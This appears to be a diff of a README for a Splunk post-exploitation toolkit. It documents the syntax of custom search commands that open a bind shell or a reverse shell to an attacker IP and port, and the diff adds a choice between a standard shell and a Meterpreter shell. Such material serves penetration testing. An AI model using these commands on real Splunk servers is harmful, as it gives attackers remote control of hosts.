TBGSecurity/splunk_shells/README.md

 # Usage
 using each of these shells can be done from the Search and Reporting app.
 Execute the following searches:

-'| bindshell PORTNUMBER' The port number can be specified or left off if left off the default is 8888
+'| bindshell SHELLTYPE PORTNUMBER'
+SHELLTYPE - Specify std or msf (std = Standard Shell|msf = Meterpreter Shell)
+PORTNUMBER - Specify the port you want the bind shell to listen on.
+If you do not specify a port number it defaults to 8888

-'| revshell ATTACKERIP ATTACKERPORT' The Attacker IP and Port need to be specified for the shell to call back.
+'| revshell SHELLTYPE ATTACKERIP ATTACKERPORT' SHELLTYPE - Specify std or msf (std = Standard Shell|msf = Meterpreter Shell) ATTACKERIP - Specify the IP that you want to shell to be sent back to.
+ATTACKERPORT - Specify the port you want the shell to be sent back to.